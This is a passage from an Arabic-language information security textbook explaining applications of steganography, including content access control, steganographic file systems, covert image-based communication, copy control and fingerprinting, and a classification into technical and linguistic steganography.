‫وﻻ اﻟﺑرﻧﺎﻣﺞ اﻟذي اﺳﺗﺧدم ﻓﻲ ﻋﻣﻠﯾﺔ اﻹﺧﻔﺎء‪ ،‬وﻻ ﻛﻠﻣﺔ اﻟﺳر وﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﺻﻌب ﻋﻠﯾﮫ‪ ،‬إزاﻟﺗﮭﺎ‪ ،‬وإﻋﺎدة اﻟﻧﺳﺦ‪.‬‬

‫‪Application of Steganography‬‬

‫ﺗطﺑﯾﻖ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (Steganography‬ﯾﺧﺗﻠف ﻓﻲ ﻛﺛﯾر ﻣن ﻣﻧطﻘﮫ اﻟﻰ أﺧرى واﻟﻣﻧطﻘﺔ ﺗﻌﺗﻣد ﻋﻠﻰ ﻣﺎ اﻟﻣﯾزة ﻣن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬
‫واﻻﺳﺗﻔﺎدة ﻣﻧﮭﺎ‪ .‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﯾﻧطﺑﻖ ﻋﻠﻰ اﻻﺗﻲ‪:‬‬
‫‪Access Control System for Digital Content Distribution‬‬

‫ﻓﻲ 'ﻧظﺎم ﻣراﻗﺑﺔ اﻟوﺻول' ﻟﻧظﺎم 'ﺗوزﯾﻊ اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ'‪ ،‬اﻟﺑﯾﺎﻧﺎت اﻟﻣﺿﻣﻧﺔ ﺗﻛون 'ﻣﺧﻔﯾﺔ'‪ ،‬وﻟﻛﻧﮭﺎ 'ﻣﻔﺳره' ﻹﻋﻼن اﻟﻣﺣﺗوى‪.‬‬
‫اﻟﯾوم‪ ،‬أﺻﺑﺣت اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﺗوزع ﺑﻛﺛره ﻋﺑر ﺷﺑﻛﺔ اﻻﻧﺗرﻧت أﻛﺛر ﻣن ذي ﻗﺑل‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﺷرﻛﺎت اﻟﻣوﺳﯾﻘﻰ ﺗﻘوم ﺑﺎﻹﻓراج‬
‫ﻋن أﻟﺑوﻣﮭﺎ اﻟﺟدﯾد ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮭﺎ ﺑطرﯾﻘﺔ ﻣﺟﺎﻧﯾﺔ أو ﻣﻘﺎﺑل اﻟﻣﺎل‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﺎن ﻛﺎﻓﺔ اﻟﻣﺣﺗوﯾﺎت ﯾﻣﻛن ﺗوزﯾﻌﮭﺎ‬
‫ﺑﺎﻟﺗﺳﺎوي ﻋﻠﻰ اﻟﻧﺎس اﻟذﯾن ﯾﻣﻛﻧﮭم اﻟوﻟوج‪/‬اﻟوﺻول إﻟﻰ اﻟﺻﻔﺣﺔ‪ .‬ﻟذﻟك‪ ،‬ﻻ ﺗﺗﻧﺎﺳب ﻣﻊ ﻣﺧطط ﺗوزﯾﻊ اﻟوﯾب اﻟﻌﺎدﯾﺔ )ﺣﺎﻟﺔ ﺑﺣﺎﻟﺔ(‪ ،‬واﻟﺗوزﯾﻊ‬
‫'اﻻﻧﺗﻘﺎﺋﻲ'‪ .‬ﺑﺎﻟطﺑﻊ ﻣن اﻟﻣﻣﻛن داﺋﻣﺎ ً إرﻓﺎق اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﺑرﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ وإرﺳﺎﻟﮭﺎ إﻟﻰ اﻟﻌﻣﻼء‪ .‬وﻟﻛن ھذا ﺳوف ﯾﺄﺧذ اﻟﻛﺛﯾر‬
‫ﻣن اﻟﺗﻛﺎﻟﯾف ﻓﻲ اﻟوﻗت واﻟﻌﻣل‪.‬‬
‫ﻓﻣﺎذا إذا ﻛﺎن ﻣن اﻟﻣﻣﻛن ﺗﺣﻣﯾل ھذا اﻟﻣﺣﺗوى ﻋﻠﻰ اﻹﻧﺗرﻧت ﺑطرﯾﻘﺔ ﺳرﯾﺔ‪ .‬ﺛم اﻣﻛﻧك اﻟﺣﺻول ﻋﻠﻰ إﺻدار ﺧﺎص ﺑك ﻣن 'ﻣﻔﺗﺎح اﻟوﺻول'‬
‫واﻟذي ﺑواﺳطﺗﮫ ﺳوف ﺗﻘوم ﺑﺎﺳﺗﺧراج اﻟﻣﺣﺗوى ﺑﺷﻛل اﻧﺗﻘﺎﺋﻲ‪ ،‬ﻓﺈﻧك ﺳوف ﺗﻛون ﺳﻌﯾدة ﺟدا ً ﺑذﻟك‪ .‬ﻟذﻟك ﻣﺧطط ‪ Steganography‬ﯾﻣﻛن أن‬
‫ﯾﺳﺎﻋد ﻓﻲ ﺗﺣﻘﯾﻖ ھذا اﻟﻧوع ﻣن اﻟﻧظﺎم‪.‬‬

‫ھﻧﺎ ﻗﻣﻧﺎ ﺑﺗطوﯾر اﻟﻧﻣوذج اﻷوﻟﻰ )‪(prototype‬ﻣن "ﻧظﺎم ﻣراﻗﺑﺔ اﻟدﺧول)‪ " (Access Control System‬ﻟﺗوزﯾﻊ اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ﻣن‬
‫ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﺗﺷرح اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ ھذا اﻟﻣﺧطط‪.‬‬
‫‪ -1‬ﻣﺎﻟك اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ﯾﻘوم ﺑﺗﺻﻧﯾف اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﻓﻲ ﺻورة ﻣﺟﻠد ﻣن اﻟﻣﺟﻠدات‪ ،‬وﺗﺿﻣﯾن ھذه اﻟﻣﺟﻠدات ﻛﺎﻣﻠﺔ ﻓﻲ وﻋﺎء‬
‫ﻛﺑﯾر وﻓﻘﺎ ﻷﺳﻠوب ‪ Steganography‬اﻟﻣﺳﺗﺧدم ﯾﺣﺗﺎج اﻟﻰ ﻣﻔﺎﺗﯾﺢ ﻟﻠوﺻول إﻟﻰ ھذه اﻟﻣﺟﻠدات‪ ،‬ﺛم ﺗﺣﻣﯾل ھذا اﻟوﻋﺎء اﻟﻣﺿﻣن‬
‫ﻟﻠﻣﺣﺗوى ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ‪.‬‬
‫‪ -2‬ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮫ ﺻﺎﺣب اﻟﻣﺣﺗوى ﯾﻘوم ﺑﺷرح اﻟﻣﺣﺗوى ﺑطرﯾﻘﮫ ﻣﺗﻌﻣﻘﺔ وﻧﺷرھﺎ ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم‪ .‬وﯾﺗم ﻧﺷر‬
‫ﻣﻌﻠوﻣﺎت اﻻﺗﺻﺎل ﻟﺻﺎﺣب اﻟﻣﺣﺗوى أﯾﺿﺎ )اﻟﻌﻧوان‪ ،‬ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ورﻗم اﻟﮭﺎﺗف‪ ،‬اﻟﺦ( ھﻧﺎك‪.‬‬
‫‪ -3‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﯾﺗﻠﻘﻰ اﻟﻣﺎﻟك طﻠﺑﺎت اﻟوﺻول ﻟﻠﻣﺣﺗوى ﻣن ﻗﺑل اﻟﻌﻣﻼء اﻟذﯾن ﺷﺎھدوا ﺻﻔﺣﺔ اﻟوﯾب‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﯾﺟوز ﻟﻠﻣﺎﻟك )أو‬
‫ﻗد ﻻ( ﺑﺈﻧﺷﺎء ﻣﻔﺗﺎح وﺻول وﺗﻘدﯾﻣﮭﺎ إﻟﻰ اﻟﻌﻣﻼء )ﻣﺟﺎﻧﺎ أو ﻣﻘﺎﺑل اﻟﻣﺎل(‪.‬‬
‫ﻓﻲ ھذه اﻻﻟﯾﮫ ﻓﺎن اھم ﻧﻘطﮫ ھو اﻻﺳﺗﺧراج اﻻﻧﺗﻘﺎﺋﻲ ھل ھو ﻣﻣﻛن أم ﻻ‪.‬‬
‫‪Steganography File Systems‬‬

‫‪ Steganography File Systems‬ھﻲ ﻧوع ﻣن أﻧظﻣﺔ اﻟﻣﻠﻔﺎت‪ ,‬أول ﻣن اﻗﺗرﺣﮫ روس أﻧدرﺳون‪ ،‬روﺟر ﻧﯾدام‪ ،‬وادي ﺷﺎﻣﯾر‪ .‬وھذه ﺗﻘدم‬
‫طرﯾﻘﺗﯾن رﺋﯾﺳﯾﺗﯾن ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ :‬ﺑﺎﺳﺗﺧدام ﺳﻠﺳﻠﺔ ﻣن اﻟﻣﻠﻔﺎت ذات اﻟﺣﺟم اﻟﺛﺎﺑت واﻟﺗﻲ ﺗﺗﺄﻟف أﺻﻼً ﻣن اﻟﺑﺗﺎت اﻟﻌﺷواﺋﯾﺔ ﻋﻠﻰ رأﺳﮭﺎ‬
‫'ﻧﺎﻗﻼت)‪ '(vector‬واﻟﺗﻲ ﯾﺗم ﻓرﺿﮭﺎ ﺑطرﯾﻘﺔ ﺗﺳﻣﺢ ﻟﻣﺳﺗوﯾﺎت اﻷﻣن ﺑﻔك ﺗﺷﻔﯾر ﺟﻣﯾﻊ اﻟﻣﺳﺗوﯾﺎت اﻻدﻧﻰ وﻟﻛن ﻻ ﺗﻌﻠم ﺑوﺟود ﻣﺳﺗوﯾﺎت اﻻﻣن‬
‫اﻷﻋﻠﻰ‪ ،‬أو ﻗﺳم ﻛﺎﻣل ﻣﻠﻲء ﺑﺎﻟﺑﺗﺎت اﻟﻌﺷواﺋﯾﺔ واﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ ذﻟك‪.‬‬

‫اﻟطرﯾﻘﺔ اﻟﺛﺎﻧﯾﺔ واﻟﺗﻲ ﯾﻘدﻣﮭﺎ ‪ Steganography File Systems‬وھﻲ أن اﻟﻣﻠﻔﺎت ﻻ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﺑطرﯾﻘﺔ ﻋﺎدﯾﮫ‪ ،‬وﻻ ﺗﺧزﯾﻧﮭﺎ ﺑطرﯾﻘﺔ‬
‫ﻣﺷﻔرة‪ ،‬ﻟﻛن اﻟﺑﺎرﺗﺷن ﺑﺎﻟﻛﺎﻣل ﯾﺗم ﺟﻌﻠﮫ ﻋﺷواﺋﯾﺎ ‪--‬اﻟﻣﻠﻔﺎت اﻟﻣﺷﻔرة ﺗﺷﺑﮫ ﺑﻘوة اﻟﻣﻘﺎطﻊ اﻟﻌﺷواﺋﯾﺔ ﻟﻠﺑﺎرﺗﺷن‪ ،‬وﺣﺗﻰ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺧزﯾن اﻟﻣﻠﻔﺎت‬
‫ﻋﻠﻰ اﻟﺑﺎرﺗﺷن‪ ،‬ﻻ ﺗوﺟد طرﯾﻘﺔ ﺳﮭﻠﺔ ﻟﻠﺗﻣﯾﯾز ﺑﯾن رطﺎﻧﺔ ﻻ ﻣﻌﻧﻰ ﻟﮭﺎ واﻟﻣﻠﻔﺎت اﻟﻣﺷﻔرة اﻟﻔﻌﻠﯾﺔ‪ .‬وﻋﻼوة ﻋﻠﻰ ذﻟك‪ ،‬ﻓﺄن ﻣواﻗﻊ اﻟﻣﻠﻔﺎت ﺗﻛون‬
‫ﻣﻌرﻓﺔ ﻣن ﻗﺑل ﻣﻔﺎﺗﯾﺢ اﻟﻣﻠﻔﺎت‪ ،‬وﻣواﻗﻊ اﻟﻣﻠﻔﺎت ﺗﻛون ﻣﺧﻔﯾﺔ وﻣﺗﺎﺣﺔ ﻓﻘط ﻟﻠﺑراﻣﺞ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬وھذا ﯾؤدي إﻟﻰ اﻟﻣﺷﻛﻠﺔ وھﻲ اﻧﮫ ﯾﻣﻛن‬
‫اﻟﻛﺗﺎﺑﺔ ﻓوق اﻟﻣﻠﻔﺎت ﺑﻌﺿﮭﺎ اﻟﺑﻌض ﺑﺳرﻋﺔ ﺟداً؛ وھذا ﯾﺗم ﺣﻠﮫ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ﻛﺎﻓﺔ اﻟﻣﻠﻔﺎت ﻓﻲ أﻣﺎﻛن ﻣﺗﻌددة ﻟﺗﻘﻠﯾل ﻓرﺻﺔ ﻓﻘد اﻟﺑﯾﺎﻧﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪456‬‬

‫‪Media Bridging‬‬

‫اﺳﺗﺧدام إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟرﻗﻣﯾﺔ‪ ،‬ﺣﯾث ﯾﻣﻛن ﺗﺷﻔﯾر اﻻﺗﺻﺎﻻت اﻹﻟﻛﺗروﻧﯾﺔ ﻓﻲ طﺑﻘﺔ اﻟﻧﻘل)‪ ، (transport layer‬ﻣﺛل ﻣﻠف اﻟﻣﺳﺗﻧد أو‬
‫ﻣﻠف ﺻورة أو ﺑرﻧﺎﻣﺞ أو ﺑروﺗوﻛول‪.‬‬
‫ﻓﻲ ھذه اﻟﻣﻧطﻘﺔ ﺗطﺑﯾﻖ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻟﯾس ﻣﮭﻣﺎ‪ ،‬وﻟﻛن ﺗوﺣﯾد ھذﯾن اﻟﻧوﻋﯾن ﻣن اﻟﺑﯾﺎﻧﺎت )اﻟوﺳﺎﺋط – اﻟﺑﯾﺎﻧﺎت( إﻟﻰ واﺣد ھو اﻷﻛﺛر‬
‫أھﻣﯾﺔ‪ .‬اﻟوﺳﺎﺋط ﻣﺛل )اﻟﺻور‪ ،‬اﻻﻓﻼم‪ ،‬اﻟﻣوﺳﯾﻘﻰ‪ ،‬إﻟﺦ( ﯾﺗم رﺑطﮭﺎ ﺑﺑﻌض اﻟﻣﻌﻠوﻣﺎت اﻷﺧرى‪ .‬اﻟﺻورة‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻗد ﺗﺣﺗوي ﻋﻠﻰ‬
‫ﻣﺎ ﯾﻠﻲ ﻣن اﻟﻣﻌﻠوﻣﺎت‪:‬‬
‫‪ -1‬ﻋﻧوان ﻟﻠﺻورة وﺑﻌض اﻟﻣﻌﻠوﻣﺎت ﻋن ‪.physical object‬‬
‫‪ -2‬اﻟﺗﺎرﯾﺦ واﻟوﻗت ﻋﻧد اﺗﺧﺎذ ھذه اﻟﺻورة‪.‬‬
‫‪ -3‬ﻣﻌﻠوﻣﺎت ﻋن اﻟﻛﺎﻣﯾرا اﻟﻣﺳﺗﺧدﻣﺔ واﻟﻣﺻور‪.‬‬
‫ھذه اﻟﻣﻌﻠوﻣﺎت داﺋﻣﺎ ﻣﺎ ﺗﻛون ﺑﺟﺎﻧب ﻛل ﺻوره‪.‬‬
‫ﻓﻲ اﻟﻣﻣﺎرﺳﺎت اﻟﻌﻣﻠﯾﺔ‪ ،‬ﻋﻧد اﺳﺗﺧدام إﺧﻔﺎء ﺑﻌض اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﯾﺟب أوﻻً ﺗﺣدﯾد ﺑﯾﺎﻧﺎت اﻟﻣﺳﺗودع اﻟذي ﺳوف ﯾﺣﻣل اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﺑﺎءه وﻓﻘﺎ‬
‫ﻟﺣﺟم ﺑﯾﺎﻧﺎت اﻟﺗﺿﻣﯾن‪ .‬وﯾﻧﺑﻐﻲ أن ﯾﻛون اﻟﻣﺳﺗودع ﻏﯾر ﺿﺎرة‪ .‬ﺛم‪ ،‬ﯾﻣﻛﻧك ﺗﺿﻣﯾن ﺑﯾﺎﻧﺎت ﺳرﯾﺔ ﺑﺎﺳﺗﺧدام ﺑرﻧﺎﻣﺞ ﺗﺿﻣﯾن )واﻟذي أﺣد‬
‫ﻣﻛوﻧﺎت اﻟﺑرﻧﺎﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت( ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑﻌض اﻟﻣﻔﺗﺎح‪ .‬ﻋﻧد اﺳﺗﺧراج‪ ،‬اﻟﺑﯾﺎﻧﺎت )اﻟطرف اﻟﺧﺎص ﺑك( ﺑﺎﺳﺗﺧدام ﺑرﻧﺎﻣﺞ‬
‫اﺳﺗﺧراج )ﻣﻛون آﺧر( ﻻﺳﺗرداد ﺑﯾﺎﻧﺎت ﻣﺿﻣﻧﮫ ﺑﻧﻔس اﻟﻣﻔﺗﺎح )اﻟﻣﻔﺗﺎح اﻟﻌﺎم ﻣن ﺣﯾث ﻣﻔﮭوم اﻟﺗﺷﻔﯾر(‪ .‬وﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﺗﺣﺗﺎج اﻟﻰ 'ﻣﻔﺗﺎح‬
‫اﻟﺗﻔﺎوض ﻗﺑل أن ﺗﺑدأ اﻻﺗﺻﺎﻻت‪.‬‬
‫إرﻓﺎق ﻣﻠف ﺳﺗﯾﺟو ﺑرﺳﺎﻟﺔ اﻟﺑرﯾد إﻟﻛﺗروﻧﻲ ھو أﺑﺳط ﻣﺛﺎل ﻓﻲ ھذا اﻟﻣﺟﺎل‪ .‬وﻟﻛن أﻧت واﻟطرف اﻟﺧﺎص ﺑك ﯾﺟب اﻟﻘﯾﺎم ﺑﺈﺟراء 'إرﺳﺎل‪--‬و‪--‬‬
‫ﺗﻠﻘﻲ' اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺗم ﻣﻼﺣظﺗﮭﺎ ﻣن ﻗﺑل طرف ﺛﺎﻟث‪ .‬ﻟذا‪ ،‬اﺳﺗﺧدام اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻟﯾس أﺳﻠوب اﺗﺻﺎل ﺳري ﺗﻣﺎﻣﺎ‪.‬‬
‫ھﻧﺎك ﺑﻌض أﺳﻠوب اﻻﺗﺻﺎل اﻷﺧرى ﻣﺛل اﻟذي ﯾﺳﺗﺧدم 'ﺻﻔﺣﺔ اﻟوﯾب' اﻹﻧﺗرﻧت‪ .‬ﻓﻲ ھذه اﻟطرﯾﻘﺔ ﻻ ﺗﺣﺗﺎج إﻟﻰ إرﺳﺎل أي ﺷﻲء إﻟﻰ اﻟطرف‬
‫اﻟﺧﺎص ﺑك‪ ،‬وﻻ أﺣد ﯾﺳﺗطﯾﻊ ﻛﺷف اﻻﺗﺻﺎل اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻓﻠﻧظر اﻟﻰ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪:‬‬

‫ﻟﻧﻔرض ﻣﺛﻼ وﺟود ﺷﺧﺻﯾن ﯾرﯾدان اﻟﺑدء ﻓﻲ اﺗﺻﺎل ﺳري ﺑﯾﻧﮭم ﻣﺛﻼ ﻓﻠﯾﻛن ھذﯾن اﻟﺷﺧﺻﯾن )‪ Mr. A‬و‪ ( Mr. B‬ﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪.‬‬
‫ﻧﺟد أن ﻟدﯾﮭم ﻛل ﺻﻔﺣﺎت اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﻧﺟد ان اﻟﺷﺧص ‪ Mr. A‬ﯾﻣﻠك ﺑﯾﺎﻧﺎت ﺻورة )ﺻورة اﻣرأة(‪ ،‬واﻟﺷﺧص‬
‫‪ Mr. B‬ھو اﻷﺧر ﯾﻣﻠك ﺑﯾﺎﻧﺎت ﺻورة )ﺻورة اﻟﺣوت اﻟﻘﺎﺗل(‪ .‬واﻻﺛﻧﯾن واﻓﻘﺎ ﺑﺎﻟﻔﻌل ﻋﻠﻰ اﺳﺗﺧدام ﻣﻔﺗﺎح ﻣﺷﺗرك ﻣﻌﯾن ﻟﺗﺿﻣﯾن‪/‬اﺳﺗﺧراج‬
‫اﻟرﺳﺎﺋل‪.‬‬
‫ھذا اﻻﺗﺻﺎل ﯾﺗم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -1‬ﯾﻘوم اﻟﺷﺧص ‪ Mr. A‬أوﻻ ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ ﻧﺻﯾﮫ وﻟﯾﻛن ﻣﺛﻼ ‪ message‬ﺛم ﯾﻘوم ﺑﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﺻورة اﻣرأة ﻟﯾﻧﺗﺞ ﻣﻠف ﺳﺗﯾﺟو ﻣن‬
‫ﺻورة اﻣراه‪.‬‬
‫‪ -2‬ﺛم ﯾﻘوم اﻟﺷﺧص ‪ Mr. A‬ﺑﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب ﺧﺎﺻﺗﮫ‪.‬‬
‫‪ -3‬ﻗرﯾﺑﺎ ﺳوف ﯾﻼﺣظ اﻟﺷﺧص ‪ Mr. B‬ﺑذﻟك‪ ،‬ﺛم ﯾﻘوم ﺑﺗﺣﻣﯾﻠﮭﺎ‪.‬‬
‫‪ -4‬ﺛم ﯾﻘوم اﻟﺷﺧص ‪ Mr. B‬ﺑﺎﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﺻورة ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ اﻻﺳﺗﺧراج ﻣﻊ اﻟﻣﻔﺗﺎح اﻟﻣﺷﺗرك ﺑﯾﻧﮭم‪.‬‬
‫‪ -5‬ﯾﻘوم اﻟﺷﺧص ‪ Mr. A‬ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ رد وﻟﺗﻛن ﻣﺛﻼ ‪ .REPLY‬ﺛم ﯾﻘوم ﺑﺗﺿﻣﯾﻧﮭﺎ داﺧل ﺻورة اﻟﺣوت اﻟﻘﺎﺗل‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪457‬‬

‫)‪Copy Prevention or Control (DVD‬‬

‫ﻓﻲ وﺳﺎﺋل اﻟﺗرﻓﯾﮫ ﯾﻣﻛن اﺳﺗﺧدام ‪ industry steganography‬ﻟﺣﻣﺎﯾﺔ ﺣﻘوق اﻟﺗﺄﻟﯾف واﻟﻧﺷر ﻷﻗراص اﻟﻔﯾدﯾو اﻟرﻗﻣﯾﺔ واﻷﻗراص اﻟﻣدﻣﺟﺔ‪.‬‬
‫ﺗم ﺗﺻﻣﯾم ﺑرﻧﺎﻣﺞ ﺣﻣﺎﯾﺔ ﻧﺳﺧﺔ دي ﻓﻲ دي ﻟدﻋم ﻧظﺎم إدارة ﺗوﻟﯾد اﻟﻧﺳﺦ‪.‬‬
‫)‪Metadata Hiding (Tracking Information‬‬
‫ﯾﻣﻛن اﺳﺗﺧدام اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ )‪ (metadata‬ﻟﺗﺗﺑﻊ اﻟﻣوﻗﻊ اﻟﺟﻐراﻓﻲ‪ ،‬وﻣﻧﻊ أو ﻣراﻗﺑﺔ ﻧﺳﺦ اﻟﻣواد اﻟرﻗﻣﯾﺔ‪ ،‬أي ﻣﻧﻊ اﻻزدواﺟﯾﺔ ﻏﯾر‬
‫اﻟﻣﺻرح ﺑﮭﺎ ﻟﻠﺑﯾﺎﻧﺎت اﻟرﻗﻣﯾﺔ‪.‬‬
‫)‪Broadcast Monitoring (Gibson, Pattern Recognition‬‬
‫‪Covert Communication‬‬
‫‪Ownership Assertion‬‬
‫)‪Fingerprinting (Traitor Tracking‬‬
‫)‪Authentication (Original vs. Forgery‬‬

‫‪Classification of Steganography‬‬
‫ﯾﺻﻧف ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (Steganography‬إﻟﻰ ﻣﺟﺎﻟﯾن اﺳﺗﻧﺎدا ً إﻟﻰ ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ .‬وھﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ‬
‫)‪ (technical steganography‬وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوﯾﺔ)‪. (linguistic steganography‬‬
‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ )‪ (technical steganography‬ﺗﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام اﻷﺳﺎﻟﯾب اﻟﻌﻠﻣﯾﺔ‪ ،‬ﺑﯾﻧﻣﺎ ﯾﻘوم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوﯾﺔ‬
‫)‪ (linguistic steganography‬ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ اﻟﻧﺎﻗل)‪ ،(Carrier‬وﺳﯾﻠﺔ ﺗﺳﺗﺧدم ﻟﻼﺗﺻﺎل أو ﻧﻘل اﻟرﺳﺎﺋل أو اﻟﻣﻠﻔﺎت‪ .‬ﻋﺎدة ﻣﺎ ﯾﺗم‬
‫ﺗﻌرﯾف ﻣﺗوﺳط إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (The steganography medium‬ﻋﻠﻰ أﻧﮫ اﻟﺟﻣﻊ ﺑﯾن اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ‪ ،‬واﻟﻧﺎﻗل‪ ،‬وﻣﻔﺗﺎح إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫ﯾﺻف اﻟﻣﺧطط اﻟﺗﺎﻟﻲ ﺗﺻﻧﯾف ﻟﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬

‫إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت اﻟﺘﻘﻨﻲ )‪(technical steganography‬‬


‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ ھﻲ وﺳﯾﻠﺔ ﻟﺗﺄﻣﯾن اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷﺳﺎﻟﯾب اﻟﻔﯾزﯾﺎﺋﯾﺔ أو اﻟﻛﯾﻣﯾﺎﺋﯾﺔ ﻹﺧﻔﺎء وﺟود اﻟرﺳﺎﻟﺔ اﻟﻧﺻﯾﺔ‪.‬‬
‫ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻌدﯾد ﻣن اﻷدوات واﻷﺟﮭزة واﻷﺳﺎﻟﯾب‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪458‬‬

‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ ﻟدﯾﮫ اﻟﻌدﯾد ﻣن اﻷﺳﺎﻟﯾب ﻟﺗﺣﻘﯾﻖ إﺧﻔﺎء اﻟرﺳﺎﻟﺔ‪ .‬وﺗﺷﻣل ﺑﻌض ﻣﻧﮭم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -‬اﻟﺣﺑر اﻟﺳري )‪(Invisible Ink‬‬
‫ھذا اﻷﺳﻠوب ﯾﺳﺗﺧدم اﻟﺣﺑر اﻟﺳري ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ ‪.‬‬
‫‪ -‬ﻣﯾﻛرودوﺗس )‪(Microdots‬‬
‫ھﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﺻﻔﺣﺔ ﻓﻲ ﻧﻘطﺔ واﺣده‪.‬‬
‫‪ -‬اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﻧدة إﻟﻰ اﻟﻛﻣﺑﯾوﺗر)‪(Computer-based methods‬‬
‫اﺳﺗﺧدام اﻟﻣﻌﻠوﻣﺎت واﺧﻔﺎﺋﮭﺎ ﻓﻲ اﻟﻧﺻوص‪ ،‬واﻟﺻور واﻷﺻوات وأﺷرطﺔ اﻟﻔﯾدﯾو‪ ،‬إﻟﺦ‪.‬‬
‫إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت اﻟﻠﻐﻮﯾﺔ )‪(linguistic steganography‬‬
